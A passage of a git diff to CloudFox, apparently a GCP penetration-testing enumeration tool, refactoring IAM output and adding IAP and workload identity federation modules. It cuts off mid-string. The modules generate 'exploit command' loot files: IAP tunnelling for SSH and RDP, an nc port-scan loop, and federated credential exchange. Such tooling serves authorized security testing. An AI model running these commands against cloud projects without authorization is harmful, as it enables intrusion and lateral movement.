&& len(projectTables[0].Body) > 0 { + outputData.ProjectLevelData[projectID] = IAMOutput{Table: projectTables, Loot: projectLoot} + } } - results = append(results, principals...) - logger.InfoM(fmt.Sprintf("Done retrieving IAM information for resource: %s of type %s", projectID, resourceType), globals.GCP_IAM_MODULE_NAME) - cloudfoxOutput := GCPIAMResults{Data: results} + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + outputData.ProjectLevelData[m.ProjectIDs[0]] = IAMOutput{Table: tables, Loot: lootFiles} + } - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_IAM_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_IAM_MODULE_NAME) - return + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeHierarchicalOutputTee uses single-pass streaming for large datasets. +func (m *IAMModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, tables []internal.TableFile, lootFiles []internal.LootFile) { + totalRows := 0 + for _, t := range tables { + totalRows += len(t.Body) + } + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d rows", totalRows), globals.GCP_IAM_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build reverse lookup: for each folder, which projects are under it + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, ...] + scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project binding - route to that project only + return []string{scopeID} + case "organization": + // Org binding - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + case "folder": + // Folder binding - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + return m.ProjectIDs + default: + return nil + } + } + + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile { + header := []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Member Type", + "Member", + "Role", + "Admin", + "Custom Role", + "Has Keys", + "Condition", + "MFA", + "Groups", + "Federated", + "SA Attack Paths", + } + + var body [][]string + + // Get ancestry data for this project to include org and folder bindings + var ancestorFolders []string + var projectOrgID string + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + ancestorFolders = m.OrgCache.GetProjectAncestorFolders(projectID) + projectOrgID = m.OrgCache.GetProjectOrgID(projectID) + } + + // Build a set of ancestor folder IDs for quick lookup + ancestorFolderSet := make(map[string]bool) + for _, folderID := range ancestorFolders { + ancestorFolderSet[folderID] = true + } + + // Add scope bindings - include project, org, and ancestor folder bindings + for _, sb := range m.ScopeBindings { + // Check if this binding applies to this project + include := false + switch sb.ScopeType { + case "project": + include = sb.ScopeID == projectID + case "organization": + // Include org bindings if this is the project's org + include = projectOrgID != "" && sb.ScopeID == projectOrgID + case "folder": + // Include folder bindings if folder is in project's ancestry + include = ancestorFolderSet[sb.ScopeID] + } + + if !include { + continue + } + + // Check admin status from FoxMapper only - shows Org/Folder/Project or No + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sb.MemberEmail) + if adminStatus == "" { + adminStatus = "No" + } + + isCustom := "No" + if sb.IsCustom { + isCustom = "Yes" + } + + condition := "No" + if sb.HasCondition { + condition = formatCondition(sb.ConditionInfo) + } + + mfa := "-" + if sb.MemberType == "User" { + if status, ok := m.MFAStatus[sb.MemberEmail]; ok { + if status.Error != "" { + mfa = "Unknown" + } else if status.HasMFA { + mfa = "Yes" + } else { + mfa = "No" + } + } + } else if sb.MemberType == "ServiceAccount" { + mfa = "N/A" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sb.MemberEmail]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") + } + + federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) + } + + body = append(body, []string{ + sb.ScopeType, + sb.ScopeID, + sb.ScopeName, + sb.MemberType, + sb.MemberEmail, + sb.Role, + adminStatus, + isCustom, + "-", + condition, + mfa, + groups, + federated, + attackPaths, + }) + } + + // Add service accounts for this project only + for _, sa := range m.ServiceAccounts { + if sa.ProjectID != projectID { + continue + } + + hasKeys := "No" + if sa.HasKeys { + hasKeys = "Yes" + } + + disabled := "" + if sa.Disabled { + disabled = " (disabled)" + } + + groups := "-" + if memberGroups, ok := m.MemberToGroups[sa.Email]; ok && len(memberGroups) > 0 { + groups = strings.Join(memberGroups, ", ") } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_IAM_MODULE_NAME) + + // Check admin status from FoxMapper + adminStatus := gcpinternal.GetAdminStatusFromCache(m.FoxMapperCache, sa.Email) + if adminStatus == "" { + adminStatus = "No" + } + + // Check attack paths for this service account + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) + + body = append(body, []string{ + "project", + sa.ProjectID, + m.GetProjectName(sa.ProjectID), + "ServiceAccountInfo", + sa.Email + disabled, + sa.DisplayName, + adminStatus, + "-", + hasKeys, + "-", + "N/A", + groups, + "-", + attackPaths, + }) + } + + // Add custom roles for this project only + for _, role := range m.CustomRoles { + if role.ProjectID != projectID { + continue + } + + deleted := "" + if role.Deleted { + deleted = " (deleted)" + } + + body = append(body, []string{ + "project", + role.ProjectID, + m.GetProjectName(role.ProjectID), + "CustomRole", + extractRoleName(role.Name) + deleted, + fmt.Sprintf("%s (%d permissions)", role.Title, role.PermissionCount), + "-", + "Yes", + "-", + "-", + "-", + "-", + "-", + "-", // Custom roles don't have attack paths + }) + } + + if len(body) == 0 { + return nil + } + + return []internal.TableFile{ + { + Name: "iam", + Header: header, + Body: body, + }, + } +} + +func (m *IAMModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectAllLootFiles() + + // Count security findings for logging + publicAccessFound := false + saWithKeys := 0 + highPrivCount := 0 + + for _, sb := range m.ScopeBindings { + if highPrivilegeRoles[sb.Role] { + highPrivCount++ + } + if sb.MemberType == "PUBLIC" || sb.MemberType == "ALL_AUTHENTICATED" { + publicAccessFound = true + } + } + + for _, sa := range m.ServiceAccounts { + if sa.HasKeys { + saWithKeys++ + } + } + + // Log warnings for security findings + if publicAccessFound { + logger.InfoM("[FINDING] Public access (allUsers/allAuthenticatedUsers) detected in IAM bindings!", globals.GCP_IAM_MODULE_NAME) + } + if saWithKeys > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d service account(s) with user-managed keys!", saWithKeys), globals.GCP_IAM_MODULE_NAME) + } + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege role binding(s)!", highPrivCount), globals.GCP_IAM_MODULE_NAME) + } + + output := IAMOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output scope - use org if available, otherwise fall back to project + var scopeType string + var scopeIdentifiers []string + var scopeNames []string + + if len(m.OrgIDs) > 0 { + // Use organization scope with [O] prefix format + scopeType = "organization" + for _, orgID := range m.OrgIDs { + scopeIdentifiers = append(scopeIdentifiers, orgID) + if name, ok := m.OrgNames[orgID]; ok && name != "" { + scopeNames = append(scopeNames, name) + } else { + scopeNames = append(scopeNames, orgID) + } + } + } else { + // Fall back to project scope + scopeType = "project" + scopeIdentifiers = m.ProjectIDs + for _, id := range m.ProjectIDs { + scopeNames = append(scopeNames, m.GetProjectName(id)) + } + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + scopeType, + scopeIdentifiers, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAM_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go new file mode 100644 index 00000000..b9fe0229 --- /dev/null +++ b/gcp/commands/iap.go @@ -0,0 +1,332 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + iapservice "github.com/BishopFox/cloudfox/gcp/services/iapService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIAPCommand = &cobra.Command{ + Use: globals.GCP_IAP_MODULE_NAME, + Aliases: []string{"identity-aware-proxy"}, + Short: "Enumerate Identity-Aware Proxy configurations", + Long: `Enumerate Identity-Aware Proxy (IAP) configurations. + +Features: +- Lists IAP tunnel destination groups +- Analyzes IAP settings and bindings +- Identifies overly permissive tunnel configurations +- Checks for public access to IAP resources`, + Run: runGCPIAPCommand, +} + +type IAPModule struct { + gcpinternal.BaseGCPModule + ProjectTunnelDestGroups map[string][]iapservice.TunnelDestGroup // projectID -> groups + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type IAPOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IAPOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IAPOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPIAPCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IAP_MODULE_NAME) + if err != nil { + return + } + + module := &IAPModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectTunnelDestGroups: make(map[string][]iapservice.TunnelDestGroup), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *IAPModule) getAllTunnelDestGroups() []iapservice.TunnelDestGroup { + var all []iapservice.TunnelDestGroup + for _, groups := range m.ProjectTunnelDestGroups { + all = append(all, groups...) + } + return all +} + +func (m *IAPModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IAP_MODULE_NAME, m.processProject) + + allGroups := m.getAllTunnelDestGroups() + if len(allGroups) == 0 { + logger.InfoM("No IAP tunnel destination groups found", globals.GCP_IAP_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d IAP tunnel destination group(s)", + len(allGroups)), globals.GCP_IAP_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *IAPModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating IAP in project: %s", projectID), globals.GCP_IAP_MODULE_NAME) + } + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["iap-commands"] = &internal.LootFile{ + Name: "iap-commands", + Contents: "# IAP Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := iapservice.New() + + // Get tunnel destination groups + groups, err := svc.ListTunnelDestGroups(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAP_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAP tunnel groups in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectTunnelDestGroups[projectID] = groups + for _, group := range groups { + m.addToLoot(projectID, group) + } + m.mu.Unlock() + } +} + +func (m *IAPModule) addToLoot(projectID string, group iapservice.TunnelDestGroup) { + lootFile := m.LootMap[projectID]["iap-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# TUNNEL DESTINATION GROUP: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDRs: %s\n"+ + "# FQDNs: %s\n", + group.Name, group.ProjectID, group.Region, + strings.Join(group.CIDRs, ", "), + strings.Join(group.FQDNs, ", "), + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe tunnel destination group: +gcloud iap tcp dest-groups describe %s --region=%s --project=%s + +# List IAM policy for tunnel destination group: +gcloud iap tcp dest-groups get-iam-policy %s --region=%s --project=%s + +# List all IAP tunnel resources in project: +gcloud iap tcp dest-groups list --region=%s --project=%s + +# Check who can use IAP tunnels in this project: +gcloud projects get-iam-policy %s --format=json | jq '.bindings[] | select(.role | contains("iap.tunnelResourceAccessor"))' + +`, group.Name, group.Region, group.ProjectID, + group.Name, group.Region, group.ProjectID, + group.Region, group.ProjectID, + group.ProjectID, + ) + + // === EXPLOIT COMMANDS - IAP Tunnel === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH through IAP tunnel + for _, cidr := range group.CIDRs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to hosts in CIDR %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + cidr, group.ProjectID, + ) + } + + for _, fqdn := range group.FQDNs { + lootFile.Contents += fmt.Sprintf( + "# Start IAP TCP tunnel to %s:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 22 --local-host-port=localhost:2222 --zone=ZONE --project=%s\n"+ + "ssh -p 2222 localhost\n\n", + fqdn, group.ProjectID, + ) + } + + lootFile.Contents += fmt.Sprintf( + "# SSH to a compute instance through IAP (direct):\n"+ + "gcloud compute ssh INSTANCE_NAME --tunnel-through-iap --zone=ZONE --project=%s\n\n"+ + "# Forward RDP through IAP (Windows instances):\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 3389 --local-host-port=localhost:3389 --zone=ZONE --project=%s\n\n"+ + "# Forward arbitrary port through IAP:\n"+ + "gcloud compute start-iap-tunnel INSTANCE_NAME 8080 --local-host-port=localhost:8080 --zone=ZONE --project=%s\n\n"+ + "# Port scan through IAP tunnel (test internal connectivity):\n"+ + "for PORT in 22 80 443 3306 5432 8080 8443; do\n"+ + " gcloud compute start-iap-tunnel INSTANCE_NAME $PORT --local-host-port=localhost:$PORT --zone=ZONE --project=%s &\n"+ + " sleep 1 && nc -z localhost $PORT 2>/dev/null && echo \"Port $PORT is open\" || echo \"Port $PORT is closed\"\n"+ + " kill %%1 2>/dev/null\n"+ + "done\n\n", + group.ProjectID, + group.ProjectID, + group.ProjectID, + group.ProjectID, + ) +} + +func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *IAPModule) getHeader() []string { + return []string{ + "Project", + "Name", + "Region", + "CIDRs", + "FQDNs", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *IAPModule) groupsToTableBody(groups []iapservice.TunnelDestGroup) [][]string { + var body [][]string + for _, group := range groups { + cidrs := strings.Join(group.CIDRs, ", ") + if cidrs == "" { + cidrs = "-" + } + fqdns := strings.Join(group.FQDNs, ", ") + if fqdns == "" { + fqdns = "-" + } + + if len(group.IAMBindings) > 0 { + for _, binding := range group.IAMBindings { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.Name, + group.Region, + cidrs, + fqdns, + binding.Role, + binding.Member, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(group.ProjectID), + group.Name, + group.Region, + cidrs, + fqdns, + "-", + "-", + }) + } + } + return body +} + +func (m *IAPModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if groups, ok := m.ProjectTunnelDestGroups[projectID]; ok && len(groups) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: m.getHeader(), + Body: m.groupsToTableBody(groups), + }) + } + + return tableFiles +} + +func (m *IAPModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectTunnelDestGroups { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = IAPOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} + +func (m *IAPModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allGroups := m.getAllTunnelDestGroups() + + var tables []internal.TableFile + + if len(allGroups) > 0 { + tables = append(tables, internal.TableFile{ + Name: "iap-tunnel-groups", + Header: m.getHeader(), + Body: m.groupsToTableBody(allGroups), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := IAPOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_IAP_MODULE_NAME) + } +} diff --git a/gcp/commands/identityfederation.go b/gcp/commands/identityfederation.go new file mode 100644 index 00000000..24652071 --- /dev/null +++ b/gcp/commands/identityfederation.go @@ -0,0 +1,621 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + workloadidentityservice "github.com/BishopFox/cloudfox/gcp/services/workloadIdentityService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPIdentityFederationCommand = &cobra.Command{ + Use: globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + Aliases: []string{"federation", "wif", "federated-identity"}, + Short: "Enumerate Workload Identity Federation (external identities)", + Long: `Enumerate Workload Identity Federation pools, providers, and federated bindings. + +Workload Identity Federation allows external identities (AWS, GitHub Actions, +GitLab CI, Azure AD, etc.) to authenticate as GCP service accounts without +using service account keys. + +Features: +- Lists Workload Identity Pools and Providers +- Analyzes AWS, OIDC (GitHub Actions, GitLab CI), and SAML providers +- Identifies risky provider configurations (missing attribute conditions) +- Shows federated identity bindings to GCP service accounts +- Generates exploitation commands for pentesting + +Security Considerations: +- Providers without attribute conditions allow ANY identity from the source +- OIDC providers (GitHub Actions, GitLab) may allow any repo/pipeline to authenticate +- AWS providers allow cross-account access from the configured AWS account +- Federated identities inherit all permissions of the bound GCP service account + +TIP: Run 'workload-identity' to enumerate GKE-specific K8s SA -> GCP SA bindings. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPIdentityFederationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type IdentityFederationModule struct { + gcpinternal.BaseGCPModule + + ProjectPools map[string][]workloadidentityservice.WorkloadIdentityPool // projectID -> pools + ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers + ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type IdentityFederationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o IdentityFederationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o IdentityFederationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPIdentityFederationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + if err != nil { + return + } + + module := &IdentityFederationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPools: make(map[string][]workloadidentityservice.WorkloadIdentityPool), + ProjectProviders: make(map[string][]workloadidentityservice.WorkloadIdentityProvider), + ProjectFederatedBindings: make(map[string][]workloadidentityservice.FederatedIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *IdentityFederationModule) Execute(ctx context.Context, logger internal.Logger) { + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, m.processProject) + + allPools := m.getAllPools() + allProviders := m.getAllProviders() + allFederatedBindings := m.getAllFederatedBindings() + + if len(allPools) == 0 { + logger.InfoM("No Workload Identity Federation configurations found", globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s)", + len(allPools), len(allProviders), len(allFederatedBindings)), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllPools returns all pools from all projects +func (m *IdentityFederationModule) getAllPools() []workloadidentityservice.WorkloadIdentityPool { + var all []workloadidentityservice.WorkloadIdentityPool + for _, pools := range m.ProjectPools { + all = append(all, pools...) + } + return all +} + +// getAllProviders returns all providers from all projects +func (m *IdentityFederationModule) getAllProviders() []workloadidentityservice.WorkloadIdentityProvider { + var all []workloadidentityservice.WorkloadIdentityProvider + for _, providers := range m.ProjectProviders { + all = append(all, providers...) + } + return all +} + +// getAllFederatedBindings returns all federated bindings from all projects +func (m *IdentityFederationModule) getAllFederatedBindings() []workloadidentityservice.FederatedIdentityBinding { + var all []workloadidentityservice.FederatedIdentityBinding + for _, bindings := range m.ProjectFederatedBindings { + all = append(all, bindings...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *IdentityFederationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Identity Federation in project: %s", projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } + + wiSvc := workloadidentityservice.New() + + // Get Workload Identity Pools + allPools, err := wiSvc.ListWorkloadIdentityPools(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list Workload Identity Pools in project %s", projectID)) + return + } + + // Filter out GKE Workload Identity pools (*.svc.id.goog) - those belong to the workload-identity module + var pools []workloadidentityservice.WorkloadIdentityPool + for _, pool := range allPools { + if !strings.HasSuffix(pool.PoolID, ".svc.id.goog") { + pools = append(pools, pool) + } + } + + var providers []workloadidentityservice.WorkloadIdentityProvider + + // Get providers for each pool + for _, pool := range pools { + poolProviders, err := wiSvc.ListWorkloadIdentityProviders(projectID, pool.PoolID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not list providers for pool %s", pool.PoolID)) + continue + } + providers = append(providers, poolProviders...) + } + + // Find federated identity bindings + fedBindings, err := wiSvc.FindFederatedIdentityBindings(projectID, pools) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IDENTITY_FEDERATION_MODULE_NAME, + fmt.Sprintf("Could not find federated identity bindings in project %s", projectID)) + } + + m.mu.Lock() + m.ProjectPools[projectID] = pools + m.ProjectProviders[projectID] = providers + m.ProjectFederatedBindings[projectID] = fedBindings + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["identity-federation-commands"] = &internal.LootFile{ + Name: "identity-federation-commands", + Contents: "# Identity Federation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, pool := range pools { + m.addPoolToLoot(projectID, pool) + } + for _, provider := range providers { + m.addProviderToLoot(projectID, provider) + } + for _, fedBinding := range fedBindings { + m.addFederatedBindingToLoot(projectID, fedBinding) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d pool(s), %d provider(s), %d federated binding(s) in project %s", + len(pools), len(providers), len(fedBindings), projectID), globals.GCP_IDENTITY_FEDERATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *IdentityFederationModule) addPoolToLoot(projectID string, pool workloadidentityservice.WorkloadIdentityPool) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + status := "Active" + if pool.Disabled { + status = "Disabled" + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# FEDERATION POOL: %s\n"+ + "# =============================================================================\n"+ + "# Display Name: %s\n"+ + "# State: %s (%s)\n"+ + "# Description: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe pool:\n"+ + "gcloud iam workload-identity-pools describe %s --location=global --project=%s\n\n"+ + "# List providers:\n"+ + "gcloud iam workload-identity-pools providers list --workload-identity-pool=%s --location=global --project=%s\n\n", + pool.PoolID, + pool.DisplayName, + pool.State, status, + pool.Description, + pool.PoolID, pool.ProjectID, + pool.PoolID, pool.ProjectID, + ) +} + +func (m *IdentityFederationModule) addProviderToLoot(projectID string, provider workloadidentityservice.WorkloadIdentityProvider) { + lootFile := m.LootMap[projectID]["identity-federation-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# PROVIDER: %s/%s (%s)\n"+ + "# -----------------------------------------------------------------------------\n", + provider.PoolID, provider.ProviderID, + provider.ProviderType, + ) + + if provider.ProviderType == "AWS" { + lootFile.Contents += fmt.Sprintf( + "# AWS Account: %s\n", provider.AWSAccountID) + } else if provider.ProviderType == "OIDC" { + lootFile.Contents += fmt.Sprintf( + "# OIDC Issuer: %s\n", provider.OIDCIssuerURI) + } + + if provider.AttributeCondition != "" { + lootFile.Contents += fmt.Sprintf( + "# Attribute Condition: %s\n", provider.AttributeCondition) + } else { + lootFile.Contents += "# Attribute Condition: NONE (any identity from this provider can authenticate!)\n" + } + + lootFile.Contents += "\n# === ENUMERATION COMMANDS ===\n\n" + lootFile.Contents += fmt.Sprintf( + "# Describe provider:\n"+ + "gcloud iam workload-identity-pools providers describe %s --workload-identity-pool=%s --location=global --project=%s\n\n", + provider.ProviderID, provider.PoolID, provider.ProjectID, + ) + + // Add exploitation guidance based on provider type + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + switch provider.ProviderType { + case "AWS": + lootFile.Contents += fmt.Sprintf( + "# From AWS account %s, exchange credentials:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# projects/%s/locations/global/workloadIdentityPools/%s/providers/%s \\\n"+ + "# --aws --output-file=gcp-creds.json\n\n", + provider.AWSAccountID, + provider.ProjectID, provider.PoolID, provider.ProviderID, + ) + case "OIDC": + if strings.Contains(provider.OIDCIssuerURI, "github") { + lootFile.Contents += fmt.Sprintf( + "# From GitHub Actions workflow, add:\n"+ + "# permissions:\n"+ + "# id-token: write\n"+ + "# contents: read\n"+ + "# Then use:\n"+ + "# gcloud iam workload-identity-pools create-cred-config \\\n"+ + "# 